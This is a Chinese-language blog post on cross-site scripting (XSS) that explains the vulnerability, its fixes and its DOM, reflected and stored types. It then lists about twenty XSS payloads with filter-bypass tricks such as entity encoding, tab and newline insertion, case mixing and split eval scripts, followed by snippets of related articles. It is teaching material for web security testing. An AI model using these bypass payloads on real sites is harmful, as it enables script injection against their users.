XSS漏洞

最新推荐文章于 2024-11-01 16:03:12 发布
最新推荐文章于 2024-11-01 16:03:12 发布
阅读量124 收藏
点赞数
分类专栏: 网络安全-渗透篇 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Massimo__JAVA/article/details/130380910
版权
文章介绍了XSS跨站脚本攻击的原理,指出了由于系统对用户输入过滤不足,允许恶意脚本执行。提出了修复措施,包括字符转义和使用HTTPOnly。同时详细列举了不同类型的XSS,如DOM型、反射型和存储型,并展示了多种常见的payload及其绕过方法。
摘要由CSDN通过智能技术生成

一、介绍

XSS又叫CSS(Cross Site Script),跨站脚本攻击。因与html中的css样式重名,所以称之为XSS。

二、原理

系统对用户的输入过滤不严,导致用户可以输入恶意的脚本代码,如js,并且能够被浏览器执行,而达到攻击者的目的。

三、修复方式

1、对实体字符进行转义
在这里插入图片描述
2、使用HTTP Only来禁止JavaScript读取cookie值

3、输入时校验、浏览器与Web应用端采用相同的字符编码

四、分类

1、DOM型:修改HTML DOM节点,俗称自己玩自己
2、反射型:也叫非持久性,只能执行一次,再次执行的话,需要重新输入
3、存储型:也叫持久性,存储到数据库中

五、发现

1、找输入:寻找用户可以输入的位置
2、找输出:寻找输入内容显示的位置
3、构造payload

六、常见payload及绕过

//1
<script>alert(1)</script>

//2
<script>location="https://www.baidu.com"</script>

//3
<script>alert(document.cookie)</script>

//4
<img src=1 onerror=alert(1)>

//5
<a href="javascript:alert(1)">aa</a>

//6
<input name="keyword" value=""oninput="alert(1)">

//7
<input name="keyword" value=""onclick="alert(1)">

//8  对script关键字进行编码
<a href="java&#115;&#99;&#114;&#105;&#112;&#116;:alert(1)">aa</a>

//9
<script>confirm(1)</script>

//10
<script>prompt(1)</script>

//12 事件驱动
<img src='./11.jpg' onmouseover='alert(1)'> 
<input type="text" onkeydown="alert(1)">
<input type="text" onkeyup="alert(1)">
.......

//13
<svg onload="alert(1)"> //svg是h5的标签,onload也是事件,提交即触发

//14
<input onfocus=alert(1) autofocus> //onfucus为事件,聚焦(当光标放到目标)即触发

//15 大小写混编
html对大小写不敏感,js对大小写敏感

//16  [/]代替空格
<a/href="javascript:alert(1)">111</a>

//17 在一些关键字内插入回车符与tab符,绕过关键字检测
<img src	='#' onerror='alert(1)'>
<a href="ja	va
script:alert(1)">111</a>  //ja tab符 va...

//18 编码绕过
可以对标签属性值进行转码,来实现绕过,转码后要加分号
字符a,的ascii码97,十进制编码&#97; , 十六进制编码&#x61
字符e,的ascii码101,十进制编码&3101 , 十六进制编码&#x65

tab ==> &#9;
换行 ==> &#10;
回车 ==> &#13;

<a href="j&#97;v&#x61;script:alert(1)">11</a> //经过简单编码
<A href="&#01;j&#97;v&#x61;s&#9;c&#10;r&#13;ipt:alert(1)">11</a> //经过插入字符

//19 拆分跨站
<script>z='alert'</script>
<script>z=z+'(1)'</script>
<script>eval(z)</script>
//将语句拆分成多个,拼接起来后执行。若后台对字符串长度做限制,则可用拆分跨站将一个较长的shellcode拆成几部分。

//20 css变形

//21
<a href="#" onClick="return confirm(1)">11</a>

//22
<a href="javascript:top['al\145rt']`1`">11</a>
Massimo_ycw
关注
专栏目录
XSS漏洞防御
2301_80361487的博客
01-24 537
• 黑名单验证:对包含XSS代码特征的内容进行过滤,如“”、”script”、”#”• 白名单验证:对用户提交的数据进行检查,只接受指定长度范围内、采用适当格式和预期。禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。禁止内联脚本执行(规则较严格,目前发现 GitHub 使用)。禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。4)可以采用白名单验证或者黑名单验证方法。禁止加载外域代码,防止复杂的攻击逻辑。• 对所有输出字符进行HTML编码。字符的输入,其余一律过滤。
XSS漏洞实验
goldfish8848的博客
06-23 1266
本篇为xss漏洞实验练习,练习网址来源于网络
XSS漏洞利用
2302_79885863的博客
04-01 2370
输出编码主要有URL、HTML、JS可以采用白名单验证或者黑名单验证方法。白名单验证:对用户提交的数据进行格查,只接受指定长度范围内、采用适当格式和预期字符的输入,其余一律过滤黑名单验证:对包含XSS代码特征的内容进行过滤,如"“、“script”、”#"等·对所有输出字符进行HTML编码‘’ 转成& gt;‘&’ 转成& amp;" 转成& quot;’ 转成& #39;
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
XSS漏洞学习
m0_63017297的博客
06-17 1300
定义:XSS(Cross Site Scripting)攻击全称跨站脚本攻击,是为不和层叠样式表 (Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。成因:XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植 入到提供给其它用户使用的页面中,而程序对输入和输出的控制不够严格,导致“精心构造” 的脚本输入后,再输到前端时被浏览器当作有效代码解析执行从而产生危害。当受害者访问 这些页面时,浏览器会解析并执行这些恶意代码。
xss漏洞
nigo134的博客
03-22 695
XSS 漏洞简介 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export. XSS分类: 反射型:
XSS漏洞检测和利用
2301_80127209的博客
04-25 1743
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞
XSS 漏洞
Just a Blog
05-01 1746
XSS 漏洞
xss 漏洞
dante_777的博客
07-08 607
xss
DedeCMS 存储型xss漏洞1
08-03
【DedeCMS 存储型 XSS 漏洞1】详解 DedeCMS 是一款广泛使用的基于PHP的开源网站管理系统,其特色在于提供了一个简洁易用的后台管理界面,帮助企业或个人快速构建网站。然而,如同任何软件一样,DedeCMS 也存在安全...
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 966
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
前端如何安全存储密钥,防止信息泄露
AM1n98的博客
10-30 1228
把公钥写在前端代码文件里被公司检测到了要整改,整理几种常见的前端密钥存储方案。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 1159
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
轻型民用无人驾驶航空器安全操控理论培训知识总结-多旋翼部分
Lizzy_Fly的博客
10-30 872
15.航空器的视觉避障只有在光照等环境条件满足视觉系统工作要求时才能生效,光照条件特别暗或者特别亮的情况下,请谨慎飞行,即使视觉系统正常工作时,也可能无法精准识别高压线,而且高压线还会影响图传和遥控信号,因此不建议在高压线间飞行,如因电力巡检等工作原因必须在此环境下飞行,建议经专门培训后再进行操作;当航空器记录了返航点并且在定位服务良好的情况下,航空器电池电量不足、遥控器与航空器之间失去通讯信号以及图传信号丢失时,将会触发自动返航,操控员也可主动开启自动返航,航空器将自动返回返航点并降落。
Linux系统安全配置
qq_24442273的博客
10-28 903
【代码】Linux系统安全配置。
【Python爬虫实战】网络爬虫完整指南:HTTP/HTTPS协议与爬虫安全实践
小火龙的博客
10-29 1117
是互联网的核心协议之一,用于在客户端(如浏览器或爬虫)和服务器之间传输数据。HTTP协议定义了请求和响应的格式,帮助不同设备进行信息交换,例如我们在浏览网页时,浏览器就是通过HTTP向服务器请求页面内容,然后显示在用户面前。是HTTP协议的升级版,通过SSL/TLS加密协议增强了数据传输的安全性。HTTPS协议会在数据传输过程中对数据进行加密,防止中途被拦截或篡改,因此在保护用户隐私和敏感信息方面起到了重要作用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值